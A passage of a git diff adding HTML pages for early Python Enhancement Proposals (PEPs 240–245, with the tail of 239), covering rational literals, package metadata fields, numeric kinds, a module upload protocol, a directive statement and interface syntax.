    • (this assumes that after unification int and rational would be +different types:) Types should rarely depend on values. It’s +easier to reason when the type of a variable is known: I know +how I can use it. I can determine that something is an int and +expect that other objects used in this place will be ints too.
    • +
    • (this assumes the same type for them:) Int is a good type in +itself, not to be mixed with rationals. The fact that +something is an integer should be expressible as a statement +about its type. Many operations require ints and don’t accept +rationals. It’s natural to think about them as about different +types.
    • +
    +
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0239.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0240/index.html b/pep-0240/index.html new file mode 100644 index 00000000000..d7bf3f9c283 --- /dev/null +++ b/pep-0240/index.html @@ -0,0 +1,212 @@ + + + + + + + + PEP 240 – Adding a Rational Literal to Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 240 – Adding a Rational Literal to Python

+
+
Author:
+
Christopher A. Craig <python-pep at ccraig.org>, Moshe Zadka <moshez at zadka.site.co.il>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
11-Mar-2001
+
Python-Version:
+
2.2
+
Post-History:
+
16-Mar-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

A different PEP suggests adding a builtin rational type to +Python. This PEP suggests changing the ddd.ddd float literal to a +rational in Python, and modifying non-integer division to return +it.

+
+
+

BDFL Pronouncement

+

This PEP is rejected. The needs outlined in the rationale section +have been addressed to some extent by the acceptance of PEP 327 +for decimal arithmetic. Guido also noted, “Rational arithmetic +was the default ‘exact’ arithmetic in ABC and it did not work out as +expected”. See the python-dev discussion on 17 June 2005 [1].

+
+
+

Rationale

+

Rational numbers are useful for exact and unsurprising arithmetic. +They give the correct results people have been taught in various +math classes. Making the “obvious” non-integer type one with more +predictable semantics will surprise new programmers less than +using floating point numbers. As quite a few posts on c.l.py and +on tutor@python.org have shown, people often get bit by strange +semantics of floating point numbers: for example, round(0.98, 2) +still gives 0.97999999999999998.

+
+
+

Proposal

+

Literals conforming to the regular expression '\d*.\d*' will be +rational numbers.

+
+
+

Backwards Compatibility

+

The only backwards compatible issue is the type of literals +mentioned above. The following migration is suggested:

+
    +
  1. The next Python after approval will allow +from __future__ import rational_literals +to cause all such literals to be treated as rational numbers.
  2. +
  3. Python 3.0 will have a warning, turned on by default, about +such literals in the absence of a __future__ statement. The +warning message will contain information about the __future__ +statement, and indicate that to get floating point literals, +they should be suffixed with “e0”.
  4. +
  5. Python 3.1 will have the warning turned off by default. This +warning will stay in place for 24 months, at which time the +literals will be rationals and the warning will be removed.
  6. +
+
+
+

Common Objections

+

Rationals are slow and memory intensive! +(Relax, I’m not taking floats away, I’m just adding two more characters. +1e0 will still be a float)

+

Rationals must present themselves as a decimal float or they will be +horrible for users expecting decimals (i.e. str(.5) should return '.5' and +not '1/2'). This means that many rationals must be truncated at some +point, which gives us a new loss of precision.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0240.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0241/index.html b/pep-0241/index.html new file mode 100644 index 00000000000..7a81a347a27 --- /dev/null +++ b/pep-0241/index.html @@ -0,0 +1,398 @@ + + + + + + + + PEP 241 – Metadata for Python Software Packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 241 – Metadata for Python Software Packages

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
12-Mar-2001
+
Post-History:
+
19-Mar-2001
+
Superseded-By:
+
314
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Introduction

+

This PEP describes a mechanism for adding metadata to Python +packages. It includes specifics of the field names, and their +semantics and usage.

+
+
+

Including Metadata in Packages

+

The Distutils ‘sdist’ command will be modified to extract the +metadata fields from the arguments and write them to a file in the +generated zipfile or tarball. This file will be named PKG-INFO +and will be placed in the top directory of the source +distribution (where the README, INSTALL, and other files usually +go).

+

Developers may not provide their own PKG-INFO file. The “sdist” +command will, if it detects an existing PKG-INFO file, terminate +with an appropriate error message. This should prevent confusion +caused by the PKG-INFO and setup.py files being out of sync.

+

The PKG-INFO file format is a single set of RFC 822 headers +parseable by the rfc822.py module. The field names listed in the +following section are used as the header names. There’s no +extension mechanism in this simple format; the Catalog and Distutils +SIGs will aim at getting a more flexible format ready for Python 2.2.

+
+
+

Fields

+

This section specifies the names and semantics of each of the +supported metadata fields.

+

Fields marked with “(Multiple use)” may be specified multiple +times in a single PKG-INFO file. Other fields may only occur +once in a PKG-INFO file. Fields marked with “(optional)” are +not required to appear in a valid PKG-INFO file, all other +fields must be present.

+
+

Metadata-Version

+

Version of the file format; currently “1.0” is the only +legal value here.

+

Example:

+
Metadata-Version: 1.0
+
+
+
+
+

Name

+

The name of the package.

+

Example:

+
Name: BeagleVote
+
+
+
+
+

Version

+

A string containing the package’s version number. This +field should be parseable by one of the Version classes +(StrictVersion or LooseVersion) in the distutils.version +module.

+

Example:

+
Version: 1.0a2
+
+
+
+
+

Platform (multiple use)

+

A comma-separated list of platform specifications, summarizing +the operating systems supported by the package. The major +supported platforms are listed below, but this list is +necessarily incomplete.

+
POSIX, MacOS, Windows, BeOS, Palm OS.
+
+
+

Binary distributions will use the Supported-Platform field in +their metadata to specify the OS and CPU for which the binary +package was compiled. The semantics of the Supported-Platform +are not specified in this PEP.

+

Example:

+
Platform: POSIX, Windows
+
+
+
+
+

Summary

+

A one-line summary of what the package does.

+

Example:

+
Summary: A module for collecting votes from beagles.
+
+
+
+
+

Description (optional)

+

A longer description of the package that can run to several +paragraphs. (Software that deals with metadata should not +assume any maximum size for this field, though one hopes that +people won’t include their instruction manual as the +long-description.)

+

Example:

+
Description: This module collects votes from beagles
+             in order to determine their electoral wishes.
+             Do NOT try to use this module with basset hounds;
+             it makes them grumpy.
+
+
+
+
+

Keywords (optional)

+

A list of additional keywords to be used to assist searching +for the package in a larger catalog.

+

Example:

+
Keywords: dog puppy voting election
+
+
+
+
+

Home-page (optional)

+

A string containing the URL for the package’s home page.

+

Example:

+
Home-page: http://www.example.com/~cschultz/bvote/
+
+
+
+
+

Author (optional)

+

A string containing at a minimum the author’s name. Contact +information can also be added, separating each line with +newlines.

+

Example:

+
Author: C. Schultz
+        Universal Features Syndicate
+        Los Angeles, CA
+
+
+
+
+

Author-email

+

A string containing the author’s e-mail address. It can contain +a name and e-mail address in the legal forms for a RFC 822 +‘From:’ header. It’s not optional because cataloging systems +can use the e-mail portion of this field as a unique key +representing the author. A catalog might provide authors the +ability to store their GPG key, personal home page, and other +additional metadata about the author, and optionally the +ability to associate several e-mail addresses with the same +person. Author-related metadata fields are not covered by this +PEP.

+

Example:

+
Author-email: "C. Schultz" <cschultz@example.com>
+
+
+
+
+

License

+

A string selected from a short list of choices, specifying the +license covering the package. Some licenses result in the +software being freely redistributable, so packagers and +resellers can automatically know that they’re free to +redistribute the software. Other licenses will require +a careful reading by a human to determine how the software can be +repackaged and resold.

+

The choices are:

+
Artistic, BSD, DFSG, GNU GPL, GNU LGPL, "MIT",
+Mozilla PL, "public domain", Python, Qt PL, Zope PL, unknown,
+nocommercial, nosell, nosource, shareware, other
+
+
+

Definitions of some of the licenses are:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
DFSGThe license conforms to the Debian Free Software +Guidelines, but does not use one of the other +DFSG conforming licenses listed here. +More information is available at: +http://www.debian.org/social_contract#guidelines
PythonPython 1.6 or higher license. Version 1.5.2 and +earlier are under the MIT license.
public domainSoftware is public domain, not copyrighted.
unknownStatus is not known
nocommercialFree private use but commercial use not permitted
nosellFree use but distribution for profit by arrangement
nosourceFreely distributable but no source code
sharewarePayment is requested if software is used
otherGeneral category for other non-DFSG licenses
+

Some of these licenses can be interpreted to mean the software is +freely redistributable. The list of redistributable licenses is:

+
Artistic, BSD, DFSG, GNU GPL, GNU LGPL, "MIT",
+Mozilla PL, "public domain", Python, Qt PL, Zope PL,
+nosource, shareware
+
+
+

Note that being redistributable does not mean a package +qualifies as free software, ‘nosource’ and ‘shareware’ being +examples.

+

Example:

+
License: MIT
+
+
+
+
+
+

Acknowledgements

+

Many changes and rewrites to this document were suggested by the +readers of the Distutils SIG. In particular, Sean Reifschneider +often contributed actual text for inclusion in this PEP.

+

The list of licenses was compiled using the SourceForge license +list and the CTAN license list compiled by Graham Williams; Carey +Evans also offered several useful suggestions on this list.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0241.rst

+

Last modified: 2024-10-06 16:27:00 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0242/index.html b/pep-0242/index.html new file mode 100644 index 00000000000..a8fb13fb594 --- /dev/null +++ b/pep-0242/index.html @@ -0,0 +1,328 @@ + + + + + + + + PEP 242 – Numeric Kinds | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 242 – Numeric Kinds

+
+
Author:
+
Paul F. Dubois <paul at pfdubois.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
17-Mar-2001
+
Python-Version:
+
2.2
+
Post-History:
+
17-Apr-2001
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP has been withdrawn.

+

×

+

The kinds module will not be added to the standard library.

+

There was no opposition to the proposal but only mild interest in +using it, not enough to justify adding the module to the standard +library. Instead, it will be made available as a separate +distribution item at the Numerical Python site. At the next +release of Numerical Python, it will no longer be a part of the +Numeric distribution.

+

+
+
+

Abstract

+

This proposal gives the user optional control over the precision +and range of numeric computations so that a computation can be +written once and run anywhere with at least the desired precision +and range. It is backward compatible with existing code. The +meaning of decimal literals is clarified.

+
+
+

Rationale

+

Currently it is impossible in every language except Fortran 90 to +write a program in a portable way that uses floating point and +gets roughly the same answer regardless of platform – or refuses +to compile if that is not possible. Python currently has only one +floating point type, equal to a C double in the C implementation.

+

No type exists corresponding to single or quad floats. It would +complicate the language to try to introduce such types directly +and their subsequent use would not be portable. This proposal is +similar to the Fortran 90 “kind” solution, adapted to the Python +environment. With this facility an entire calculation can be +switched from one level of precision to another by changing a +single line. If the desired precision does not exist on a +particular machine, the program will fail rather than get the +wrong answer. Since coding in this style would involve an early +call to the routine that will fail, this is the next best thing to +not compiling.

+
+
+

Supported Kinds of Ints and Floats

+

Complex numbers are treated separately below, since Python can be +built without them.

+

Each Python compiler may define as many “kinds” of integer and +floating point numbers as it likes, except that it must support at +least two kinds of integer corresponding to the existing int and +long, and must support at least one kind of floating point number, +equivalent to the present float.

+

The range and precision of these required kinds are processor +dependent, as at present, except for the “long integer” kind, +which can hold an arbitrary integer.

+

The built-in functions int(), long(), and float() convert inputs +to these default kinds as they do at present. (Note that a +Unicode string is actually a different “kind” of string and that a +sufficiently knowledgeable person might be able to expand this PEP +to cover that case.)

+

Within each type (integer, floating) the compiler supports a +linearly-ordered set of kinds, with the ordering determined by the +ability to hold numbers of an increased range and/or precision.

+
+
+

Kind Objects

+

Two new standard functions are defined in a module named “kinds”. +They return callable objects called kind objects. Each int or +floating kind object f has the signature result = f(x), and each +complex kind object has the signature result = f(x, y=0.).

+
+
int_kind(n)
For an integer argument n >= 1, return a callable object whose +result is an integer kind that will hold an integer number in +the open interval (-10**n, 10**n). The kind object accepts +arguments that are integers including longs. If n == 0, +returns the kind object corresponding to the Python literal 0.
+
float_kind(nd, n)
For nd >= 0 and n >= 1, return a callable object whose result +is a floating point kind that will hold a floating-point +number with at least nd digits of precision and a base-10 +exponent in the closed interval [-n, n]. The kind object +accepts arguments that are integer or float.

If nd and n are both zero, returns the kind object +corresponding to the Python literal 0.0.

+
+
+

The compiler will return a kind object corresponding to the least +of its available set of kinds for that type that has the desired +properties. If no kind with the desired qualities exists in a +given implementation an OverflowError exception is thrown. A kind +function converts its argument to the target kind, but if the +result does not fit in the target kind’s range, an OverflowError +exception is thrown.

+

Besides their callable behavior, kind objects have attributes +giving the traits of the kind in question.

+
    +
  1. name is the name of the kind. The standard kinds are called +int, long, double.
  2. +
  3. typecode is a single-letter string that would be appropriate +for use with Numeric or module array to form an array of this +kind. The standard types’ typecodes are ‘i’, ‘O’, ‘d’ +respectively.
  4. +
  5. Integer kinds have these additional attributes: MAX, equal to +the maximum permissible integer of this kind, or None for the +long kind. MIN, equal to the most negative permissible integer +of this kind, or None for the long kind.
  6. +
  7. Float kinds have these additional attributes whose properties +are equal to the corresponding value for the corresponding C +type in the standard header file “float.h”. MAX, MIN, DIG, +MANT_DIG, EPSILON, MAX_EXP, MAX_10_EXP, MIN_EXP, +MIN_10_EXP, RADIX, ROUNDS +(== FLT_RADIX, FLT_ROUNDS in float.h). These +values are of type integer except for MAX, MIN, and EPSILON, +which are of the Python floating type to which the kind +corresponds.
  8. +
+
+
+

Attributes of Module kinds

+

int_kinds is a list of the available integer kinds, sorted from lowest +to highest kind. By definition, int_kinds[-1] is the long kind.

+

float_kinds is a list of the available floating point kinds, sorted +from lowest to highest kind.

+

default_int_kind is the kind object corresponding to the Python +literal 0

+

default_long_kind is the kind object corresponding to the Python +literal 0L

+

default_float_kind is the kind object corresponding to the Python +literal 0.0

+
+
+

Complex Numbers

+

If supported, complex numbers have real and imaginary parts that +are floating-point numbers with the same kind. A Python compiler +must support a complex analog of each floating point kind it +supports, if it supports complex numbers at all.

+

If complex numbers are supported, the following are available in +module kinds:

+
+
complex_kind(nd, n)
Return a callable object whose result is a complex kind that +will hold a complex number each of whose components (.real, +.imag) is of kind float_kind(nd, n). The kind object will +accept one argument that is of any integer, real, or complex +kind, or two arguments, each integer or real.
+
+

complex_kinds is a list of the available complex kinds, sorted +from lowest to highest kind.

+

default_complex_kind is the kind object corresponding to the +Python literal 0.0j. The name of this kind +is doublecomplex, and its typecode is ‘D’.

+

Complex kind objects have these addition attributes:

+

floatkind is the kind object of the corresponding float type.

+
+
+

Examples

+

In module myprecision.py:

+
import kinds
+tinyint = kinds.int_kind(1)
+single = kinds.float_kind(6, 90)
+double = kinds.float_kind(15, 300)
+csingle = kinds.complex_kind(6, 90)
+
+
+

In the rest of my code:

+
from myprecision import tinyint, single, double, csingle
+n = tinyint(3)
+x = double(1.e20)
+z = 1.2
+# builtin float gets you the default float kind, properties unknown
+w = x * float(x)
+# but in the following case we know w has kind "double".
+w = x * double(z)
+
+u = csingle(x + z * 1.0j)
+u2 = csingle(x+z, 1.0)
+
+
+

Note how that entire code can then be changed to a higher +precision by changing the arguments in myprecision.py.

+

Comment: note that you aren’t promised that single != double; but +you are promised that double(1.e20) will hold a number with 15 +decimal digits of precision and a range up to 10**300 or that the +float_kind call will fail.

+
+
+

Open Issues

+

No open issues have been raised at this time.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0242.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0243/index.html b/pep-0243/index.html new file mode 100644 index 00000000000..87732a80360 --- /dev/null +++ b/pep-0243/index.html @@ -0,0 +1,278 @@ + + + + + + + + PEP 243 – Module Repository Upload Mechanism | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 243 – Module Repository Upload Mechanism

+
+
Author:
+
Sean Reifschneider <jafo-pep at tummy.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
18-Mar-2001
+
Python-Version:
+
2.1
+
Post-History:
+
20-Mar-2001, 24-Mar-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

For a module repository system (such as Perl’s CPAN) to be +successful, it must be as easy as possible for module authors to +submit their work. An obvious place for this submit to happen is +in the Distutils tools after the distribution archive has been +successfully created. For example, after a module author has +tested their software (verifying the results of setup.py sdist), +they might type setup.py sdist --submit. This would flag +Distutils to submit the source distribution to the archive server +for inclusion and distribution to the mirrors.

+

This PEP only deals with the mechanism for submitting the software +distributions to the archive, and does not deal with the actual +archive/catalog server.

+
+
+

Upload Process

+

The upload will include the Distutils PKG-INFO meta-data +information (as specified in PEP 241), the actual software +distribution, and other optional information. This information +will be uploaded as a multi-part form encoded the same as a +regular HTML file upload request. This form is posted using +ENCTYPE="multipart/form-data" encoding (RFC 1867).

+

The upload will be made to the host “www.python.org” on port +80/tcp (POST http://www.python.org:80/pypi). The form +will consist of the following fields:

+
    +
  • distribution – The file containing the module software (for +example, a .tar.gz or .zip file).
  • +
  • distmd5sum – The MD5 hash of the uploaded distribution, +encoded in ASCII representing the hexadecimal representation +of the digest (for byte in digest: s = s + ('%02x' % +ord(byte))).
  • +
  • pkginfo (optional) – The file containing the distribution +meta-data (as specified in PEP 241). Note that if this is +not included, the distribution file is expected to be in .tar +format (gzipped and bzipped compressed are allowed) or .zip +format, with a PKG-INFO file in the top-level directory it +extracts (package-1.00/PKG-INFO).
  • +
  • infomd5sum (required if pkginfo field is present) – The MD5 hash +of the uploaded meta-data, encoded in ASCII representing the +hexadecimal representation of the digest (for byte in digest: +s = s + ('%02x' % ord(byte))).
  • +
  • platform (optional) – A string representing the target +platform for this distribution. This is only for binary +distributions. It is encoded as +<os_name>-<os_version>-<platform architecture>-<python +version>.
  • +
  • signature (optional) – A OpenPGP-compatible signature of +the uploaded distribution as signed by the author. This may +be used by the cataloging system to automate acceptance of +uploads.
  • +
  • protocol_version – A string indicating the protocol version that +the client supports. This document describes protocol version “1”.
  • +
+
+
+

Return Data

+

The status of the upload will be reported using HTTP non-standard +(X-*) headers. The X-Swalow-Status header may have the following +values:

+
    +
  • SUCCESS – Indicates that the upload has succeeded.
  • +
  • FAILURE – The upload is, for some reason, unable to be +processed.
  • +
  • TRYAGAIN – The server is unable to accept the upload at this +time, but the client should try again at a later time. +Potential causes of this are resource shortages on the server, +administrative down-time, etc…
  • +
+

Optionally, there may be a X-Swalow-Reason header which includes a +human-readable string which provides more detailed information about +the X-Swalow-Status.

+

If there is no X-Swalow-Status header, or it does not contain one of +the three strings above, it should be treated as a temporary failure.

+

Example:

+
>>> f = urllib.urlopen('http://www.python.org:80/pypi')
+>>> s = f.headers['x-swalow-status']
+>>> s = s + ': ' + f.headers.get('x-swalow-reason', '<None>')
+>>> print s
+FAILURE: Required field "distribution" missing.
+
+
+
+
+

Sample Form

+

The upload client must submit the page in the same form as +Netscape Navigator version 4.76 for Linux produces when presented +with the following form:

+
<H1>Upload file</H1>
+<FORM NAME="fileupload" METHOD="POST" ACTION="pypi"
+    ENCTYPE="multipart/form-data">
+<INPUT TYPE="file" NAME="distribution"><BR>
+<INPUT TYPE="text" NAME="distmd5sum"><BR>
+<INPUT TYPE="file" NAME="pkginfo"><BR>
+<INPUT TYPE="text" NAME="infomd5sum"><BR>
+<INPUT TYPE="text" NAME="platform"><BR>
+<INPUT TYPE="text" NAME="signature"><BR>
+<INPUT TYPE="hidden" NAME="protocol_version" VALUE="1"><BR>
+<INPUT TYPE="SUBMIT" VALUE="Upload">
+</FORM>
+
+
+
+
+

Platforms

+

The following are valid os names:

+
aix beos debian dos freebsd hpux mac macos mandrake netbsd
+openbsd qnx redhat solaris suse windows yellowdog
+
+
+

The above include a number of different types of distributions of +Linux. Because of versioning issues these must be split out, and +it is expected that when it makes sense for one system to use +distributions made on other similar systems, the download client +will make the distinction.

+

Version is the official version string specified by the vendor for +the particular release. For example, “2000” and “nt” (Windows), +“9.04” (HP-UX), “7.0” (RedHat, Mandrake).

+

The following are valid architectures:

+
alpha hppa ix86 powerpc sparc ultrasparc
+
+
+
+
+

Status

+

I currently have a proof-of-concept client and server implemented. +I plan to have the Distutils patches ready for the 2.1 release. +Combined with Andrew’s PEP 241 for specifying distribution +meta-data, I hope to have a platform which will allow us to gather +real-world data for finalizing the catalog system for the 2.2 +release.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0243.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0244/index.html b/pep-0244/index.html new file mode 100644 index 00000000000..ec7d923a66c --- /dev/null +++ b/pep-0244/index.html @@ -0,0 +1,264 @@ + + + + + + + + PEP 244 – The directive statement | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 244 – The directive statement

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
20-Mar-2001
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Motivation

+

From time to time, Python makes an incompatible change to the +advertised semantics of core language constructs, or changes their +accidental (implementation-dependent) behavior in some way. While +this is never done capriciously, and is always done with the aim +of improving the language over the long term, over the short term +it’s contentious and disrupting.

+

PEP 5, Guidelines for Language Evolution suggests ways to ease +the pain, and this PEP introduces some machinery in support of +that.

+

PEP 227, Statically Nested Scopes is the first application, and +will be used as an example here.

+

When a new, potentially incompatible language feature is added, +some modules and libraries may chose to use it, while others may +not. This specification introduces a syntax where a module author +can denote whether a certain language feature is used in the +module or not.

+

In discussion of this PEP, readers commented that there are two +kinds of “settable” language features:

+
    +
  • those that are designed to eventually become the only option, at +which time specifying use of them is not necessary anymore. The +features for which the syntax of the “Back to the __future__” +PEP 236, Back to the __future__ was proposed fall into this +category. This PEP supports declaring such features, and +supports phasing out the “old” meaning of constructs whose +semantics has changed under the new feature. However, it +defines no policy as to what features must be phased out +eventually.
  • +
  • those which are designed to stay optional forever, e.g. if they +change some default setting in the interpreter. An example for +such settings might be the request to always emit line-number +instructions for a certain module; no specific flags of that +kind are proposed in this specification.
  • +
+

Since a primary goal of this PEP is to support new language +constructs without immediately breaking old libraries, special +care was taken not to break old libraries by introducing the new +syntax.

+
+
+

Syntax

+

A directive_statement is a statement of the form:

+
directive_statement: 'directive' ``NAME`` [atom] [';'] NEWLINE
+
+
+

The name in the directive indicates the kind of the directive; it +defines whether the optional atom can be present, and whether +there are further syntactical or semantical restrictions to the +atom. In addition, depending on the name of the directive, +certain additional syntactical or semantical restrictions may be +placed on the directive (e.g. placement of the directive in the +module may be restricted to the top of the module).

+

In the directive_statement, directive is a new +keyword. According to PEP 5, this keyword is initially considered as +a keyword only when used in a directive statement, see “Backwards +Compatibility” below.

+
+
+

Semantics

+

A directive statement instructs the Python interpreter to process +a source file in a different way; the specific details of that +processing depend on the directive name. The optional atom is +typically interpreted when the source code is processed; details +of that interpretation depend on the directive.

+
+
+

Specific Directives: transitional

+

If a syntactical or semantical change is added to Python which is +incompatible, PEP 5 mandates a transitional evolution of the +language, where the new feature is initially available alongside +with the old one. Such a transition is possible by means of the +transitional directive.

+

In a transitional directive, the NAME is ‘transitional’. The atom +MUST be present, and it MUST be a NAME. The possible values for +that name are defined when the language change is defined. One +example for such a directive is:

+
directive transitional nested_scopes
+
+
+

The transitional directive MUST occur at before any other +statement in a module, except for the documentation string +(i.e. it may appear as the second statement of a module only if +the first statement is a STRING+).

+
+
+

Backwards Compatibility

+

Introducing directive as a new keyword might cause +incompatibilities with existing code. Following the guideline in +PEP 5, in the initial implementation of this specification, +directive is a new keyword only if it was used in a valid +directive_statement (i.e. if it appeared as the first non-string +token in a module).

+
+
+

Unresolved Problems: directive as the first identifier

+

Using directive in a module as:

+
directive = 1
+
+
+

(i.e. the name directive appears as the first thing in a module) +will treat it as keyword, not as identifier. It would be possible +to classify it as a NAME with an additional look-ahead token, but +such look-ahead is not available in the Python tokenizer.

+
+
+

Questions and Answers

+

Q: It looks like this PEP was written to allow definition of source +code character sets. Is that true?

+

A: No. Even though the directive facility can be extended to +allow source code encodings, no specific directive is proposed.

+

Q: Then why was this PEP written at all?

+

A: It acts as a counter-proposal to PEP 236, which proposes to +overload the import statement with a new meaning. This PEP +allows to solve the problem in a more general way.

+

Q: But isn’t mixing source encodings and language changes like +mixing apples and oranges?

+

A: Perhaps. To address the difference, the predefined +“transitional” directive has been defined.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0244.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0245/index.html b/pep-0245/index.html new file mode 100644 index 00000000000..24a4dedecaf --- /dev/null +++ b/pep-0245/index.html @@ -0,0 +1,619 @@ + + + + + + + + PEP 245 – Python Interface Syntax | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 245 – Python Interface Syntax

+
+
Author:
+
Michel Pelletier <michel at users.sourceforge.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
11-Jan-2001
+
Python-Version:
+
2.2
+
Post-History:
+
21-Mar-2001
+
+
+
+
Table of Contents +
+
+

Note

+

The no-longer-available Zope interfaces wiki page +(https://www.zope.org/Wikis/Interfaces) originally linked here, +containing links to further resources for this PEP, +can be found on the Wayback Machine archive. +Also, the Interface-Dev Zope mailing list on which this PEP was discussed +was shut down, but its archives remain available.

+
+
+

Rejection Notice

+

I’m rejecting this PEP. It’s been five years now. While at some +point I expect that Python will have interfaces, it would be naive +to expect it to resemble the syntax in this PEP. Also, PEP 246 is +being rejected in favor of something completely different; interfaces +won’t play a role in adaptation or whatever will replace it. GvR.

+
+
+

Introduction

+

This PEP describes a proposed syntax for creating interface +objects in Python.

+
+
+

Overview

+

In addition to thinking about adding a static type system to +Python, the Types-SIG was also charged to devise an interface +system for Python. In December of 1998, Jim Fulton released a +prototype interfaces system based on discussions from the SIG. +Many of the issues and background information on this discussion +and prototype can be found in the SIG archives [1].

+

Around the end of 2000, Digital Creations began thinking about +better component model designs for Zope [2]. Zope’s future +component model relies heavily on interface objects. This led to +further development of Jim’s “Scarecrow” interfaces prototype. +Starting with version 2.3, Zope comes with an Interface package as +standard software. Zope’s Interface package is used as the +reference implementation for this PEP.

+

The syntax proposed by this PEP relies on syntax enhancements +describe in PEP 232 and describes an underlying framework +which PEP 233 could be based upon. There is some work being +done with regard to interface objects and Proxy objects, so for +those optional parts of this PEP you may want to see [3].

+
+
+

The Problem

+

Interfaces are important because they solve a number of problems +that arise while developing software:

+
    +
  • There are many implied interfaces in Python, commonly referred +to as “protocols”. Currently determining those protocols is +based on implementation introspection, but often that also +fails. For example, defining __getitem__ implies both a +sequence and a mapping (the former with sequential, integer +keys). There is no way for the developer to be explicit about +which protocols the object intends to implement.
  • +
  • Python is limited, from the developer’s point of view, by the +split between types and classes. When types are expected, the +consumer uses code like ‘type(foo) == type(“”)’ to determine if +‘foo’ is a string. When instances of classes are expected, the +consumer uses ‘isinstance(foo, MyString)’ to determine if ‘foo’ +is an instance of the ‘MyString’ class. There is no unified +model for determining if an object can be used in a certain, +valid way.
  • +
  • Python’s dynamic typing is very flexible and powerful, but it +does not have the advantage of static typed languages that +provide type checking. Static typed languages provide you with +much more type safety, but are often overly verbose because +objects can only be generalized by common subclassing and used +specifically with casting (for example, in Java).
  • +
+

There are also a number of documentation problems that interfaces +try to solve.

+
    +
  • Developers waste a lot of time looking at the source code of +your system to figure out how objects work.
  • +
  • Developers who are new to your system may misunderstand how your +objects work, causing, and possibly propagating, usage errors.
  • +
  • Because a lack of interfaces means usage is inferred from the +source, developers may end up using methods and attributes that +are meant for “internal use only”.
  • +
  • Code inspection can be hard, and very discouraging to novice +programmers trying to properly understand code written by gurus.
  • +
  • A lot of time is wasted when many people try very hard to +understand obscurity (like undocumented software). Effort spend +up front documenting interfaces will save much of this time in +the end.
  • +
+

Interfaces try to solve these problems by providing a way for you +to specify a contractual obligation for your object, documentation +on how to use an object, and a built-in mechanism for discovering +the contract and the documentation.

+

Python has very useful introspection features. It is well known +that this makes exploring concepts in the interactive interpreter +easier, because Python gives you the ability to look at all kinds +of information about the objects: the type, doc strings, instance +dictionaries, base classes, unbound methods and more.

+

Many of these features are oriented toward introspecting, using +and changing the implementation of software, and one of them (“doc +strings”) is oriented toward providing documentation. This +proposal describes an extension to this natural introspection +framework that describes an object’s interface.

+
+
+

Overview of the Interface Syntax

+

For the most part, the syntax of interfaces is very much like the +syntax of classes, but future needs, or needs brought up in +discussion, may define new possibilities for interface syntax.

+

A formal BNF description of the syntax is givena later in the PEP, +for the purposes of illustration, here is an example of two +different interfaces created with the proposed syntax:

+
interface CountFishInterface:
+    "Fish counting interface"
+
+    def oneFish():
+        "Increments the fish count by one"
+
+    def twoFish():
+        "Increments the fish count by two"
+
+    def getFishCount():
+        "Returns the fish count"
+
+interface ColorFishInterface:
+    "Fish coloring interface"
+
+    def redFish():
+        "Sets the current fish color to red"
+
+    def blueFish():
+        "Sets the current fish color to blue"
+
+    def getFishColor():
+        "This returns the current fish color"
+
+
+

